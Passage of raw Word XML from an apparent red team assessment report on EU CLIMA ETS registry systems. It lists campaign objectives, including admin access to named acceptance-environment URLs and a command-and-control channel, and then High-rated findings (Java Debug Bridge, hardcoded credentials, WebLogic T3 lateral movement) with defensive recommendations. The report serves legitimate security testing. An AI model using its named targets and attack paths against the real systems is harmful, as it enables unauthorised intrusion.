                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SHS – EUCR + EUTL Datawarehouse – BI (ACC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="608F4EC7" w14:textId="00D5196E"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FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="74CE10D1" w14:textId="30B05A4D" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="00BE2A8B"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0B0812" w:rsidRPr="001019D3" w14:paraId="20EDDDA6" w14:textId="77777777" w:rsidTr="00332BC0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31CE8CC5" w14:textId="0DBE38FC" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812" w:rsidP="00332BC0">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1890"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>BHS – EUTL Public + database (ACC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BFB2D9E" w14:textId="0A3D3621"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0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="4E11EE40" w14:textId="78851403" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="00BE2A8B"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0B0812" w:rsidRPr="001019D3" w14:paraId="266408BD" w14:textId="77777777" w:rsidTr="00332BC0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16189CF1" w14:textId="37420B35" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812" w:rsidP="00332BC0">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1582"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing w:val="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Compromise any CLIMA ETS assets not included in the “Out-of-scope” asset list by obtaining unauthorised access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="494987BE" w14:textId="6B5687CB"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0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="24E954B9" w14:textId="151F638A" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="00BE2A8B"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0B0812" w:rsidRPr="001019D3" w14:paraId="5E8AFE35" w14:textId="77777777" w:rsidTr="00332BC0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FEB45D7" w14:textId="4C52D256" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812" w:rsidP="00332BC0">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1582"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing w:val="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Obtain administrative access (admin role user access) on the following CLIMA assets:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FE308F1" w14:textId="77777777" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812" w:rsidP="000B0812">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>https://acc.unionregistry.ec.europa.eu/euregistry/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73DAFC76" w14:textId="77777777" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812" w:rsidP="000B0812">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>https://acc.unionregistry.ec.europa.eu/ar/#/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33141EE6" w14:textId="77777777" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812" w:rsidP="000B0812">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>https://acc.unionregistry.ec.europa.eu/na/#/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25F223EA" w14:textId="77777777" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812" w:rsidP="000B0812">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>https://intragate.acceptance.ec.europa.eu/clima/ets/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="555890FD" w14:textId="77777777" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812" w:rsidP="000B0812">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLIMA web servers (servers hosting CLIMA web app) on the scope</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41BF109A" w14:textId="77777777" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812" w:rsidP="000B0812">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLIMA IT applications and servers on the scope that can be used as jump hosts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B4E2E69" w14:textId="37229849" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812" w:rsidP="000B0812">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLIMA and ETS assets where the CTF flags are stored</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="415756A0" w14:textId="27F90D0F"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0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
          </w:tcPr>
          <w:p w14:paraId="4EA301DB" w14:textId="21C37C78" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812"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0B0812" w:rsidRPr="001019D3" w14:paraId="3F68636A" w14:textId="77777777" w:rsidTr="00332BC0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="548D9DA0" w14:textId="6C1DF5EE" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812" w:rsidP="000920D5">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1582"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing w:val="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Establish C&amp;C communication channel from any in-scope servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57E4F1CB" w14:textId="1876CBEC"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0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="051CDD74" w14:textId="1C47C41F" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812"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0B0812" w:rsidRPr="001019D3" w14:paraId="033A5FDD" w14:textId="77777777" w:rsidTr="00332BC0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="140BFE5F" w14:textId="2A9F302D" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812" w:rsidP="000920D5">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1582"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing w:val="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Provide </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>IoCs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (screenshots) from any compromised in-scope asset with the </w:t>
            </w:r>
            <w:r w:rsidR="005B6C36" w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>following:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="671B0B5E" w14:textId="77777777" w:rsidR="005B6C36" w:rsidRPr="001019D3" w:rsidRDefault="005B6C36" w:rsidP="005B6C36">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Username </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="138FF161" w14:textId="77777777" w:rsidR="005B6C36" w:rsidRPr="001019D3" w:rsidRDefault="005B6C36" w:rsidP="005B6C36">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Hostname </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="142BD16F" w14:textId="77777777" w:rsidR="005B6C36" w:rsidRPr="001019D3" w:rsidRDefault="005B6C36" w:rsidP="005B6C36">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Compromised Host IP Address </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="700E55D4" w14:textId="77777777" w:rsidR="005B6C36" w:rsidRPr="001019D3" w:rsidRDefault="005B6C36" w:rsidP="005B6C36">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Timestamp </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70FFA34B" w14:textId="77777777" w:rsidR="005B6C36" w:rsidRPr="001019D3" w:rsidRDefault="005B6C36" w:rsidP="005B6C36">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">User Account </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E8A786C" w14:textId="3979DFE9" w:rsidR="005B6C36" w:rsidRPr="001019D3" w:rsidRDefault="005B6C36" w:rsidP="005B6C36">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Privilege Level </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="713A7803" w14:textId="2079DD8D" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812" w:rsidP="000B0812">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0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="6B1AEE71" w14:textId="233277BC" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812" w:rsidP="000B0812">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bl>
    <w:p w14:paraId="6DD520DA" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="00F92F72">
      <w:bookmarkStart w:id="53" w:name="_Toc187998579"/>
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1BF992" w14:textId="7183F183" w:rsidR="00237057" w:rsidRPr="001019D3" w:rsidRDefault="00237057" w:rsidP="00237057">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc212654628"/>
      <w:bookmarkStart w:id="55" w:name="_Toc213253534"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidR="00437E8D" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> and recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="590678F3" w14:textId="685ADFDC" w:rsidR="000920D5" w:rsidRPr="001019D3" w:rsidRDefault="000920D5" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>As shown in the graph below, the Red Team identified a number of security issues, vulnerabilities or weaknesses which were leveraged to achieve the goals and objectives of the campaign:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3C4833" w14:textId="0CAAB7C1" w:rsidR="00237057" w:rsidRPr="001019D3" w:rsidRDefault="00237057" w:rsidP="00237057">
      <w:r w:rsidRPr="001019D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C5817E5" wp14:editId="1946EC9B">
            <wp:extent cx="5543550" cy="3219450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1485127357" name="Chart 148512735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AA22B5" w14:textId="77777777" w:rsidR="000920D5" w:rsidRPr="001019D3" w:rsidRDefault="000920D5" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The following table summarises the most important findings and recommendations:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1237"/>
        <w:gridCol w:w="2071"/>
        <w:gridCol w:w="5438"/>
      </w:tblGrid>
      <w:tr w:rsidR="000920D5" w:rsidRPr="001019D3" w14:paraId="1415508A" w14:textId="77777777" w:rsidTr="006016FE">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="707" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B023D0A" w14:textId="77777777" w:rsidR="000920D5" w:rsidRPr="001019D3" w:rsidRDefault="000920D5" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1184" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FEC86D0" w14:textId="77777777" w:rsidR="000920D5" w:rsidRPr="001019D3" w:rsidRDefault="000920D5" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3109" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FFCE621" w14:textId="77777777" w:rsidR="000920D5" w:rsidRPr="001019D3" w:rsidRDefault="000920D5" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00014217" w:rsidRPr="001019D3" w14:paraId="6B7E9F05" w14:textId="77777777" w:rsidTr="006016FE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="707" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10BF7BBA" w14:textId="0FD94347" w:rsidR="00014217" w:rsidRPr="001019D3" w:rsidRDefault="00014217" w:rsidP="00014217">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1184" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1CFA4DE3" w14:textId="60EF3B4F" w:rsidR="00014217" w:rsidRPr="001019D3" w:rsidRDefault="00E224E7" w:rsidP="00014217">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Java Debug Bridge vulnerable service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3109" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="498AC399" w14:textId="071D0AFD" w:rsidR="00014217" w:rsidRPr="001019D3" w:rsidRDefault="00014217" w:rsidP="00014217">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Disable the Java Debug Bridge service if it's not needed, especially in production. If it is required, restrict access to only trusted users and networks. Additionally, use separate service accounts with limited privileges for each server and service, following the principle of least privilege, to minimize the attack surface and reduce the risk of unauthorized access or resource misuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F201F" w:rsidRPr="001019D3" w14:paraId="0987878D" w14:textId="77777777" w:rsidTr="006016FE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="707" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73A765DE" w14:textId="0DCABB74" w:rsidR="001F201F" w:rsidRPr="001019D3" w:rsidRDefault="001F201F" w:rsidP="001F201F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1184" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77FBFAF1" w14:textId="73715BCA" w:rsidR="001F201F" w:rsidRPr="001019D3" w:rsidRDefault="001F201F" w:rsidP="001F201F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Insecure credentials and secrets storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3109" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="18D6F527" w14:textId="1D492743" w:rsidR="001F201F" w:rsidRPr="001019D3" w:rsidRDefault="001F201F" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Eliminate hardcoded credentials, instead use secure secrets management solutions to store and access confidential data. Encrypt sensitive data and limit access to authorized users and systems, following the principle of least privilege. Regularly assess vulnerabilities and enable logging and alerting to detect potential security threats, ensuring the security and compliance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D2BB5" w:rsidRPr="001019D3" w14:paraId="0DFB4F51" w14:textId="77777777" w:rsidTr="006016FE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="707" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F67F069" w14:textId="12F74C6E" w:rsidR="009D2BB5" w:rsidRPr="001019D3" w:rsidRDefault="009D2BB5" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1184" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="417EAADC" w14:textId="2E4DDCF0" w:rsidR="009D2BB5" w:rsidRPr="001019D3" w:rsidRDefault="009D2BB5" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WebLogic Scripting Tool (WLST) and Oracle T3 allows for lateral movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3109" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="336D9509" w14:textId="0624A482" w:rsidR="009D2BB5" w:rsidRPr="001019D3" w:rsidRDefault="009D2BB5" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Restrict access to the wlst.sh script to only high-privileged </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>users, and</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> consider removing it altogether when not in use to prevent unauthorized execution and minimize potential security risks. Restrict access to Oracle T3 only for authorized servers and applications, and configure T3 with strong security measures, including unique passwords and authentication mechanisms. Additionally, closely monitor inter-service communication, logging and alerting on any suspicious activity, to detect and respond to potential security threats in a timely manner.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
